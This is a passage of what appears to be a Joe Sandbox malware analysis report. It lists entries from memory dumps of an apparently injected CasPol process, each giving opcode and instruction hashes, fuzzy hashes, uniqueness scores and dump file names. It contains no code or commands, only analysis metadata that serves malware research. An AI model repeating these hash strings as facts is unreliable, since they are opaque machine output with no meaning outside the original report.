                                                                                                                          • Instruction ID: fb9ed273690b18de83d94e1757d7b95e01a6fa9ddfe7aec430692c119dfde53e
                                                                                                                          • Opcode Fuzzy Hash: eae84817c4e7035976c104449d9a1c0bc612cef0952bd61d505bf6fe7fba5fcc
                                                                                                                          • Instruction Fuzzy Hash: B1113375B00114AFDB14DF59CD84A9EBBBAFB8C721F144029E915A7350CB72AC11CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37840023825.000000001D63D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D63D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1d63d000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: abd941f2ea645f0b6d01a552f57ee21afec4517251f190c5a32cf2b6233f35e5
                                                                                                                          • Instruction ID: 31cb5ce462d4389ebed5b86e516c7dc2e63122c412291939b5478ec1f8cfa67b
                                                                                                                          • Opcode Fuzzy Hash: abd941f2ea645f0b6d01a552f57ee21afec4517251f190c5a32cf2b6233f35e5
                                                                                                                          • Instruction Fuzzy Hash: F411AF76504280DFCB02CF14D5C4B16BF62FB98324F24C6A9D9490B657C33AE45ACFA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37840023825.000000001D63D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D63D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1d63d000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: abd941f2ea645f0b6d01a552f57ee21afec4517251f190c5a32cf2b6233f35e5
                                                                                                                          • Instruction ID: 69e6d77d082256ff12c6730eefc17f24d91741ea1daa80e75965eaad35fdc60a
                                                                                                                          • Opcode Fuzzy Hash: abd941f2ea645f0b6d01a552f57ee21afec4517251f190c5a32cf2b6233f35e5
                                                                                                                          • Instruction Fuzzy Hash: 1411AF76504280DFCB02CF14D5C4B16BF62FB98324F24C5A9D8490B656C376D55ACBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6f37acffbd8699ae5f4c6e477bfc80fea5d0b951c9f4615d83dc54ac693a1472
                                                                                                                          • Instruction ID: 7f1843a31af5db0d1ddbce88e8f2239f5e8197e443dceb2cb21202945124753a
                                                                                                                          • Opcode Fuzzy Hash: 6f37acffbd8699ae5f4c6e477bfc80fea5d0b951c9f4615d83dc54ac693a1472
                                                                                                                          • Instruction Fuzzy Hash: 0D01B5717041654FDB14CE6B8C849BBBBEEFB84220704842AF51AC7319DB31C806C760
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8369bbfbb31f8319b8dbca0e540d5cdb3a887a06fe1555ae1959a83b7dc3725b
                                                                                                                          • Instruction ID: 1cedb9ae949fca23fb7ac7cba136bcca3eb1d2ca9600d0cd7fe70430a0c718ff
                                                                                                                          • Opcode Fuzzy Hash: 8369bbfbb31f8319b8dbca0e540d5cdb3a887a06fe1555ae1959a83b7dc3725b
                                                                                                                          • Instruction Fuzzy Hash: 7B1182716002299FDB159F1DD884A6EBBA9FB89311F084029FD0AC7351CB31C961CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a76fa586d4372416e8ea398871493acb821aa7dec90b177cdab3df6f08eca9f4
                                                                                                                          • Instruction ID: 74b3a81d8317ec4cb04d652b48433cbcd05c3ea90775aa8a9a3589fed901cfa4
                                                                                                                          • Opcode Fuzzy Hash: a76fa586d4372416e8ea398871493acb821aa7dec90b177cdab3df6f08eca9f4
                                                                                                                          • Instruction Fuzzy Hash: 2301D2752003548FD715DF1DD854A2A7BEAFF8A260B09806DE40ADB352DB30DC118B60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 20439d85ca31fb65d608fdaf8d3bd66f55de1f9f73a28f4df1e89ef5b66d5170
                                                                                                                          • Instruction ID: 668d354ecdef7b8f3237c093f80f29be62d95d27796f81c9cf80185a22f75693
                                                                                                                          • Opcode Fuzzy Hash: 20439d85ca31fb65d608fdaf8d3bd66f55de1f9f73a28f4df1e89ef5b66d5170
                                                                                                                          • Instruction Fuzzy Hash: 3101D676B001247FCB059E599C00AAF3BAFEBC9691B198029F509C7390CF729C1287A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 822c397e490e636ca4ed7c7f51f4e667ab807b6398b6c5fab117d51ee1278a03
                                                                                                                          • Instruction ID: 4490e6d60f03d2b76322d4a2aa8cce38dfaf54780f564bbdfbfb08a71f68032e
                                                                                                                          • Opcode Fuzzy Hash: 822c397e490e636ca4ed7c7f51f4e667ab807b6398b6c5fab117d51ee1278a03
                                                                                                                          • Instruction Fuzzy Hash: C901D676705155AFDF068E659C04ADF3FBAEBC9350B1DC069F504C7250CA319C1297A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 80b9df6644c2ba09b296de73880088c660c406e4118f4811cab2f0e2fb5e717b
                                                                                                                          • Instruction ID: eacaf930beb22af026da5aceff247d4535f7d3d132d8014176737a9a8b851b4f
                                                                                                                          • Opcode Fuzzy Hash: 80b9df6644c2ba09b296de73880088c660c406e4118f4811cab2f0e2fb5e717b
                                                                                                                          • Instruction Fuzzy Hash: 5E01D771A002189FCF04CFD9D9448EEBBBAFF88310F10812AE805A7614D7359915CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bcbf6ad531513813018b2fe7425ca4a5ce36bfccc9d41bfe9d7a339bb09d54d4
                                                                                                                          • Instruction ID: ed7e004be8d94d4170830d7e55faeb994fb77707bc1b2da3bae3edc501f2fb48
                                                                                                                          • Opcode Fuzzy Hash: bcbf6ad531513813018b2fe7425ca4a5ce36bfccc9d41bfe9d7a339bb09d54d4
                                                                                                                          • Instruction Fuzzy Hash: AC011974E012189FCB04DFA9E984AEEBBF5FB88310F00853AE808E7341D3349915CB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: eeddb316cdce8fd3eceb0a24d637fe171f8e883db994ad89be5e20dbbf97a35e
                                                                                                                          • Instruction ID: 58c481f7a14ccdc46470d57ce84c9c42b31f85c1f9da23b4e012a4bbc885646a
                                                                                                                          • Opcode Fuzzy Hash: eeddb316cdce8fd3eceb0a24d637fe171f8e883db994ad89be5e20dbbf97a35e
                                                                                                                          • Instruction Fuzzy Hash: 39F08272E04215CFCB80DFA898486EF7BF4EA98210B04857ED91DD3200EB344901CFD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6d645f25c6169392ea9bbb9eb615643926911cdcb84b452e421a54a291d23932
                                                                                                                          • Instruction ID: c8770b9da369402df372cf5d0cfc2770ffebbefbe06996869ff720414e885352
                                                                                                                          • Opcode Fuzzy Hash: 6d645f25c6169392ea9bbb9eb615643926911cdcb84b452e421a54a291d23932
                                                                                                                          • Instruction Fuzzy Hash: 28E012B1E001159F8B509FAD98445AF7AF8EA88251B01407AE51DE3200EA7049418BD1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 90969662cb5c6acd49057a3e4e7253d8b96596d6d0701782785f0d6d8f544d53
                                                                                                                          • Instruction ID: cbf125063c582799185abe458a5dd20a13fdb5ea3f4a6f0038a05c0373fbd9ba
                                                                                                                          • Opcode Fuzzy Hash: 90969662cb5c6acd49057a3e4e7253d8b96596d6d0701782785f0d6d8f544d53
                                                                                                                          • Instruction Fuzzy Hash: 67E0D83560860087E314AF20E49513AFFF6EBC42C3F1288ADE9C9016B0CE32C4E08747
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                          • Instruction ID: 3f29387c573ed1f0144c12f2bfe6cbea96d19282ff3e8f7bfc04d0c603797886
                                                                                                                          • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                          • Instruction Fuzzy Hash: E6C0123360D1282AA225504E7C40AA7AA8CC2C23B6A210237F91C833009C429C8101A4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.37824134829.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_1660000_CasPol.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fdf78e383c2f410845ac8f2656e162c4433cc900eee853aa4c14be6924b2e52e
                                                                                                                          • Instruction ID: 5eb2cf58a9b3ca9275319940453885e72ace95d792276b3e197a36818e2d8dd8
                                                                                                                          • Opcode Fuzzy Hash: fdf78e383c2f410845ac8f2656e162c4433cc900eee853aa4c14be6924b2e52e
                                                                                                                          • Instruction Fuzzy Hash: 19C08C34448381CFCF4387B498696927F70AF0226470A01E6C0509E0A3EB281C8AE721
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%